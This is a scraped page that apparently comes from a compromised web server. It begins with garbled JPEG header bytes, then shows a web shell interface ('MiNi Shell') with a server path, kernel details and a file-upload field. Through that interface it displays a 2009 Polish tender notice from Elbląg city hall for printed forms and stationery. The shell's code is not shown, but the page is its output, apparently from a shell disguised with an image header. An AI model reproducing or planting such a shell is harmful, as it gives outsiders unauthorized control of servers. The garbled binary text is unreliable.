JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090330/82612-N-2009.html

<p class="kh_header"><b>Elbląg: Dostawa druków dla Urzędu Miejskiego w Elblągu</b><br>
<b>Numer ogłoszenia: 82612 - 2009; data zamieszczenia: 30.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd  Miejski , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 2353536, 2393125, faks 055 2353555, 2393334.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa druków dla Urzędu Miejskiego w Elblągu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:

Dostawa druków dla Urzędu Miejskiego w Elblągu


Przedmiot główny:
Nazewnictwo wg CPV:	Różne druki

Przedmioty dodatkowe:
Nazewnictwo wg CPV:	Papier ze znakiem wodnym
Nazewnictwo wg CPV:	Rejestry papierowe i tekturowe
Nazewnictwo wg CPV:	Formularze
Nazewnictwo wg CPV:	Wizytówki

Przedmiot zamówienia obejmuje dostawę niżej wymienionych druków dla Urzędu Miejskiego w Elblągu:

A. Wzory własne:
1)	papier firmowy z nadrukiem Prezydent Miasta Elbląg z herbem w trzech kolorach (czerwony biały i złoty), napis pod herbem w kolorze niebieskim
2)	papier firmowy z nadrukiem Wiceprezydent Miasta Elbląg z herbem w trzech kolorach (czerwony biały i złoty), napis pod herbem w kolorze niebieskim
3)	teczka akt pojazdu - tektura na gumkę, wewnątrz skoroszyt A 4
4)	wniosek o rejestrację pojazdu
5)	zawiadomienie o zbyciu pojazdu
6)	podanie o wydanie zaświadczenia
7)	podanie o dopisanie/wykreślenie współwłaściciela z dowodu rejestracyjnego
8)	podanie o wydanie skierowania na wykonanie tabliczki znamionowej
9)	podanie o wydanie wtórnika nalepki kontrolnej
10)	decyzja o skierowaniu na wykonanie tabliczki znamionowej
11)	pismo o dostarczeniu dokumentów, poprawieniu wniosku - druk samokopiujący w bloczkach
12)	wezwanie na komisję w spr. leczenia odwykowego
13)	karta wędkarska
14)	zaświadczenie o rejestracji sprzętu pływającego do połowu ryb
15)	koperta z nadrukiem herb miasta, pod herbem napis Prezydent Miasta Elbląg (nadruk w trzech kolorach: czerwony, złoty, niebieski)
16)	koperta z nadrukiem herb miasta, pod herbem napis Wiceprezydent Miasta Elbląg (nadruk w trzech kolorach: czerwony, złoty, niebieski)
17)	papier firmowy z nadrukiem Rada Miejska w Elblągu ul. Łączności 1, z herbem w trzech kolorach (czerwony, biały i złoty), napis pod herbem w kolorze niebieskim
18)	papier firmowy z nadrukiem Przewodniczący Rady Miejskiej w Elblągu, z herbem w trzech kolorach (czerwony, biały i złoty), napis pod herbem w kolorze niebieskim
19)	oświadczenie pod rygorem odpowiedzialności karnej
20)	prośba o przekazywanie świadczeń na konto bankowe
21)	przekazywanie korespondencji na kancelarię główną (dwustronnie)
22)	druk o wydanie zaświadczenia
23)	zaświadczenie o zatrzymaniu dowodu osobistego
24)	poświadczenie odbioru dowodu osobistego
25)	podanie o dopisanie współmałżonka do dowodu rejestracyjnego
26)	zawiadomienie o montażu haka holowniczego
27)	zawiadomienie o montażu instalacji gazowej
28)	spis dokumentów w teczce
29)	podanie o naniesienie podatku VAT
30)	podanie o wymianę dowodu rejestracyjnego z powodu braku miejsc na badanie techniczne
31)	zawiadomienie o zmianie nazwiska
32)	zawiadomienie o zmianie adresu
33)	zawiadomienie o zniszczeniu lub utracie karty pojazdu
34)	podanie o wydanie zatrzymanego dowodu rejestracyjnego
35)	podanie o wydanie skierowania na nabicie nr nadwozia
36)	zawiadomienie o przystosowaniu pojazdu do nauki jazdy
37)	podanie o naniesienie/wykreślenie zastawu rejestrowego
38)	zawiadomienie o przystosowaniu pojazdu do przewozu osób
39)	zawiadomienie o zagubienie/kradzieży tablic rejestracyjnych
40)	zawiadomienie o zniszczeniu /utracie dowodu rejestracyjnego
41)	teczka akt ewidencyjnych kierowcy
42)	oświadczenie dot. zmian konstrukcji pojazdu
43)	informacja dotycząca zgłoszenia urodzenia dziecka - kolorowa (na zewnętrznej stronie herb miasta, pod herbem napis Urząd Miejski w Elblągu, pod napisem zdjęcie Urzędu)
44)	informacja dotycząca zgłoszenia urodzenia dziecka (tekst w kolorze zielonym)
45)	roczna karta ewidencji obecności w pracy (druk dwustronny inny układ rubryk, karton lakierowany)
46)	wizytówki (z herbem miasta w trzech kolorach: biały, czerwony i złoty)		

B. Wzory standardowe:
1)	zwrotne potwierdzenie odbioru Pu-KPA 9
2)	potwierdzenie odbioru pisma zagranicznego CN 07
3)	ewidencja wyjść w godzinach służbowych 26 kartek
4)	dziennik budowy DB2 dla obiektów budowlanych
5)	dziennik budowy DB3 dla małych obiektów budowlanych
6)	polecenie wyjazdu służbowego Os-232
7)	księga kontowa Pu-K-193
8)	zwrotne potwierdzenie odbioru nie sklejone wg wzoru Pu-KPA 9
9)	zwrotne potwierdzenie odbioru samoprzylepne wg wzoru Pu-KPA 9
10)	raport poborcy
11)	polecenie przelewu komputerowe na papierze samokopiującym 4-kartkowe K-402 S
12)	polecenie księgowania małe K167
13)	polecenie księgowania duże K167
14)	nota korygująca K-173 S
15)	księga inwentarzowa
16)	arkusze spisu z natury
17)	dowód wpłaty KP K-102 S
18)	informacja w sprawie podatku od nieruchomości IN-1 + dane o nieruchomościach ZN-1/A (jako całość)
19)	deklaracje na podatek od nieruchomości DN-1 (nowy druk)
20)	dane o nieruchomościach ZN-1/A+dane o zwolnieniach podatkowych w podatku od nieruchomości ZN-1/B (jako załącznik)
21)	deklaracje na podatek od środków transportowych DT-1
22)	załącznik do deklaracji DT-1/A
23)	rejestr przedsiębiorców - 200 stron w twardej oprawie, układ poziomy
24)	magazyn wyda (W) bloczki samokopiujące ścisłego zarachowania Gm-127 S
25)	karta magazynowa sztywna Gm-130
26)	pocztowa książka nadawcza Kn-10aS
27)	meldunek o odnalezieniu dokumentu stwierdzającego tożsamość Pu D-10
28)	zgłoszenie pobytu stałego Pu E-1
29)	zgłoszenie wymeldowania z miejsca pobytu stałego Pu E-2
30)	zgłoszenie pobytu czasowego trwającego ponad 3 miesiące Pu E-3
31)	zgłoszenie wymeldowania z pobytu czasowego ponad 3 miesiące Pu E-4
32)	karta osobowa mieszkańca Pu E-12 (karton)
33)	akt urodzenia podwójny M-1
34)	akt małżeństwa podwójny M-2
35)	akt zgonu podwójny M-3
36)	odpis zupełny aktu małżeństwa M-5  znak wodny
37)	odpis zupełny aktu urodzenia M-4 znak wodny
38)	odpis zupełny aktu zgonu M-6 znak wodny
39)	odpis skrócony aktu urodzenia M-8 znak wodny
40)	odpis skrócony aktu małżeństwa M-13 znak wodny
41)	odpis skrócony aktu zgonu M-15 znak wodny
42)	zaświadczenie o braku okoliczności wyłączających zawarcie małżeństwa M-201 znak wodny
43)	zaświadczenie o zdolności prawnej M-200 znak wodny
44)	zapewnienie M-17
45)	zawiadomienie do USC w celu naniesienia przypisku pod aktem stanu cywilnego M-52
46)	wniosek o nadanie medalu za długoletnie pożycie małżeńskie M-100
47)	wielojęzyczny odpis skrócony aktu urodzenia M-210
48)	wielojęzyczny odpis skrócony aktu małżeństwa M-211
49)	wielojęzyczny odpis skrócony aktu zgonu M-212
50)	odpis skrócony aktu urodzenia ewidencja M-8a
51)	odpis skrócony aktu małżeństwa ewidencja M-13a
52)	potwierdzenie zgłoszenia się do rejestracji przedpoborowych Pu Wk-5
53)	spis spraw Pu Kn-4
54)	wezwanie KPA-9
55)	wniosek o ustalenie prawa do zasiłku rodzinnego 
56)	wniosek o ustalenie prawa do zasiłku pielęgnacyjnego
57)	wniosek o ustalenie prawa do świadczenia pielęgnacyjnego
58)	wniosek o ustalenie prawa do świadczeń z funduszu alimentacyjnego 
59)	wniosek o ustalenie prawa do jednorazowej zapomogi z tytułu urodzenia dziecka 
60)	oświadczenie członka rodziny o wysokości dochodów uzyskanych w roku kalendarzowym poprzedzającym okres zasiłkowy, niepodlegających opodatkowaniu 
61)	oświadczenie o dochodzie uzyskiwanym z pozarolniczej działalności gospodarczej osób rozliczających się na podst. przepisów o zryczałtowanym podatku dochodowym od niektórych przychodów osiąganych przez osoby fizyczne 
62)	oświadczenie członków rodziny o dochodzie niepodlegającym opodatkowaniu, uzyskanym w roku kalendarzowym poprzedzającym okres świadczeniowy 
63)	oświadczenie o dochodzie członków rodziny rozliczających się na podst. przepisów o zryczałtowanym podatku od niektórych przychodów osiąganych przez osoby fizyczne uzyskanym w roku kalendarzowym poprzedzającym okres świadczeniowy 
	
Dla pozycji od 55 do 63 opisanych w pkt III. ppkt 1. B. Wzory standardowe SIWZ zastały załączone wzory druków aktualnie obowiązujące celem dokonania wyceny. 
Powyższe wzory druków mogą ulec zmianie po ukazaniu się aktów wykonawczych określających wzory druków.

Szczegółowy opis przedmiotu zamówienia opisanego w pkt III. ppkt 1.A. Wzory własne i ppkt 1.B. Wzory standardowe oraz ilość i wymagany format druków zawiera ZAŁĄCZNIK NR 4 do SIWZ - Wzory własne oraz ZAŁĄCZNIK NR 5 do SIWZ - Wzory standardowe.

Miejsce dostawy: Urząd Miejski w Elblągu, 82-300 Elbląg, ul. Łączności 1, I piętro, pok. 200.

Wzory druków - Wzory własne - przekazywane są  wraz z SIWZ jako ZAŁĄCZNIK NR 6 do SIWZ.
Wzory druków - Wzory standardowe - przekazywane są  wraz z SIWZ jako ZAŁĄCZNIK NR 7 do SIWZ.
Wszystkie druki wymienione w  ZAŁĄCZNIKU NR 6 do SIWZ i w ZAŁĄCZNIKU NR 7 do SIWZ znajdują się do wglądu w siedzibie Zamawiającego, tj. w Urzędzie Miejskim w Elblągu, Wydział Zamówień Publicznych, pok. 125.

Druki wymienione w pozycjach od 33 do 51 opisanych w pkt III. ppkt 1.B. Wzory standardowe SIWZ muszą być spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach.

2.	Zamawiający wymaga, aby druki tj. ich treść, format i jakość były zgodne ze wzorami Zamawiającego.

3.	Zamawiający wymaga wykonania zamówienia z podziałem na 4 etapy dostawy:
I etap	- w terminie 6 tygodni od daty udzielenia zamówienia
II etap	- w terminie do dnia 30 maja 2009 r.
III etap	- w terminie do dnia 30 czerwca 2009 r.
IV etap	- w terminie do dnia 20 grudnia 2009 r.

4.	Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru oferty:

Zamawiający nie przewiduje zmian postanowień zawartej umowy.

5.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.

6.	Zamawiający informuje, że nie przewiduje udzielenia zamówień uzupełniających.

7.	Zakres zamówienia:

Zakres zamówienia obejmuje dostawę druków dla Urzędu Miejskiego w Elblągu. Szczegółowy zakres zamówienia z podziałem na etapy dostawy zawiera  ZAŁĄCZNIK NR 4 do SIWZ - Wzory własne oraz ZAŁĄCZNIK NR 5 do SIWZ - Wzory standardowe.

Zamawiający wymaga złożenia:

 - zgodnie z pkt VI ppkt 2.1. SIWZ Oświadczenia wynikającego z art. 25 ust. 1 pkt 2)    ustawy Prawo zamówień    publicznych.
Uwaga:
a)	   Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa  każdy      
       z  Wykonawców wspólnie ubiegających się o udzielenie zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9, 22.42.00.00-0, 22.81.00.00-1, 22.82.00.00-4, 30.19.97.30-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i spełniający warunki art. 22 ust. 1 tj. Wykonawcy, którzy:

1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;

Warunkiem udziału w postępowaniu jest:
a)  wykonanie w sposób należyty w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia co najmniej 2 dostaw druków odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia o wartości co najmniej 30 000,00 zł brutto każda;

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

1) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 1. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt. VI. ppkt 1.1. SIWZ i dokumentu wymienionego w pkt. VI. ppkt 1.2. SIWZ.
2) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2.a) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ i dokumentów wymienionych w pkt VI. ppkt 1.3. SIWZ.
     Przy ocenie spełnienia tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 3. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.
4) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 4. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI. SIWZ, metodą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga dostarczenia:

-  zgodnie z pkt VI. ppkt 1.1. SIWZ - Oświadczeń wynikających z art. 22 i 24 ustawy Prawo zamówień publicznych.
Uwaga:
a)	Treść wymaganych Oświadczeń Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

-  zgodnie z pkt VI. ppkt 1.2. SIWZ - Aktualnego  odpisu  z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga:
a)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

-   zgodnie z pkt VI. ppkt 1.3. Wykazu wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenie dokumentów potwierdzających, że te dostawy zostały wykonane należycie.
Uwaga:
a) W wykazie należy wymienić dostawy potwierdzające spełnienie przez Wykonawcę warunku     wymienionego w Sekcji III.2) pkt 2.a) ogłoszenia.
b)   Dla dostaw wymienionych w wykazie należy załączyć dokumenty potwierdzające, że te dostawy 
      zostały wykonane należycie.
c)  W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wielkości stanowiące o spełnieniu warunku będą zsumowane.

Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.

UWAGA:

1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
1)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
	
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
	
2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 1. UWAGI zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125, 82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2009 godzina 09:30, miejsce: Urząd Miejski w Elblągu
              Wydział Zamówień Publicznych pokój 125, 82-300 Elbląg ul. Łączności 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Dotyczy Sekcji II.2) ogłoszenia CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA
data rozpoczęcia: data udzielenia zamówienia 
data zakończenia: do 20 grudnia 2009 r.
		 w tym:
I etap		- 6 tygodni od daty udzielenia zamówienia
II etap	 	- do dnia 30 maja 2009 r.
III etap		- do dnia 30 czerwca 2009 r.
IV etap		- do dnia 20 grudnia 2009 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com